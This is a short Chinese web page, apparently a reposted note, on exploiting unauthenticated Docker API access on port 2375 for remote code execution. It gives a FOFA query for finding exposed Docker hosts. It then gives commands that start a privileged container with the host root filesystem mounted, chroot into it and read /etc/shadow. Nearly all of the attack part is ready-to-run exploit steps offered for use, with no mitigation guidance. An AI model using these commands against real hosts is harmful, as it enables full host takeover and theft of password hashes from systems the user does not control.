docker-API未授权访问导致RCE


1. 来源

https://twitter.com/ptswarm/status/1338477426276511749

https://mp.weixin.qq.com/s/4ayfBOYJZSoafBPuEQtUBg

2. 复现

2.1 fofa

port=2375 && protocol=="docker"

2.2 手动复现

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
chroot /mnt
cat /etc/shadow


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM